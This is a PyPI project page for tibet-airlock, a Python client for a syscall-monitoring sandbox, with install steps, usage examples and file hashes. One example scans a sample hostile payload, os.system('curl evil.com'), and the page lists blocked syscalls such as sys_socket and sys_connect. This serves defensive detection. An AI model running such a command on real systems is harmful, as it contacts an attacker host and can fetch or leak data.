Skip to main content

Zero-trust sandbox with TIBET provenance — kernel isolation in <1ms, cryptographic proof of every execution

Project description

tibet-airlock

Zero-trust sandbox with TIBET provenance. Kernel isolation in <1ms, cryptographic proof of every execution.

Python client + SNAFT bindings for the tibet-airlock Rust binary.

Install

pip install tibet-airlock

Or as part of the TIBET security bundle:

pip install tibet[security]

Use with Airlock binary (full isolation)

# Terminal 1: start the airlock
cargo install tibet-airlock
tibet-airlock

# Terminal 2: Python
from tibet_airlock import Airlock

result = Airlock.run("code:execute", "print('hello world')")
print(result.status)        # 200
print(result.safe)          # True
print(result.roundtrip_ms)  # 0.6
print(result.token)         # TIBET provenance token

Use SNAFT directly (no binary needed)

from tibet_airlock import SnaftMonitor

# Monitor syscalls for an intent
monitor = SnaftMonitor("code:execute")
monitor.log_syscall("sys_write")    # OK
monitor.log_syscall("sys_socket")   # VIOLATION - network access!

decision = monitor.triage()
print(decision.is_safe)     # False
print(decision.violations)  # ['sys_socket (blocked: dangerous syscall for any intent)']

# Or scan a payload string
monitor = SnaftMonitor("code:execute")
detected = monitor.scan_payload("import os; os.system('curl evil.com')")
decision = monitor.triage()
print(decision.is_kill)     # True

How it works

Intent -> Snapshot Wake (<0.01ms) -> SNAFT Monitor -> Triage -> TIBET Token
  1. Intent routing — each intent maps to a pre-warmed microVM snapshot
  2. SNAFT monitoring — every syscall checked against intent-specific allowlist
  3. Triage — violations = instant kill, clean = graceful shutdown
  4. TIBET token — cryptographic proof of what happened (the 4 dimensions: erin, eraan, eromheen, erachter)

Blocked syscalls (always dangerous)

sys_ptrace, sys_socket, sys_connect, sys_dlopen, sys_fork, sys_clone, sys_mount, sys_reboot, sys_kexec_load

Part of TIBET

Built by Humotica for the AInternet.


Enterprise

For private hub hosting, SLA support, custom integrations, or compliance guidance:

Enterprise enterprise@humotica.com
Support support@humotica.com
Security security@humotica.com

See ENTERPRISE.md for details.

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

tibet_airlock-0.2.0.tar.gz (11.0 kB view details)

Uploaded Source

Built Distribution

If you're not sure about the file name format, learn more about wheel file names.

tibet_airlock-0.2.0-py3-none-any.whl (8.7 kB view details)

Uploaded Python 3

File details

Details for the file tibet_airlock-0.2.0.tar.gz.

File metadata

  • Download URL: tibet_airlock-0.2.0.tar.gz
  • Upload date:
  • Size: 11.0 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/6.2.0 CPython/3.13.5

File hashes

Hashes for tibet_airlock-0.2.0.tar.gz
Algorithm Hash digest
SHA256 1960a3d86c874b6a1147cf4b7660159a2319377a6d952702c8603885536ac1a1
MD5 2f30452b52ee54f1725bf3f8ec2a2acb
BLAKE2b-256 3c44802429a26caff985d7a90d6ff8fedc1ac05fbd753946d64a2a1d8bb04c9c

See more details on using hashes here.

File details

Details for the file tibet_airlock-0.2.0-py3-none-any.whl.

File metadata

  • Download URL: tibet_airlock-0.2.0-py3-none-any.whl
  • Upload date:
  • Size: 8.7 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/6.2.0 CPython/3.13.5

File hashes

Hashes for tibet_airlock-0.2.0-py3-none-any.whl
Algorithm Hash digest
SHA256 a3d7771e77317cfa1965b51bfbf46b0bf864321dbd6b269c5f7126d2800034fc
MD5 8e6ae66523d1d13f22b8431f9658d97e
BLAKE2b-256 9a3250b0ba41a00385bb9518d0a6f26845abd9bb7d62f70bec23d1948818cfad

See more details on using hashes here.

Supported by

AWS Cloud computing and Security Sponsor Datadog Monitoring Depot Continuous Integration Fastly CDN Google Download Analytics Pingdom Monitoring Sentry Error logging StatusPage Status page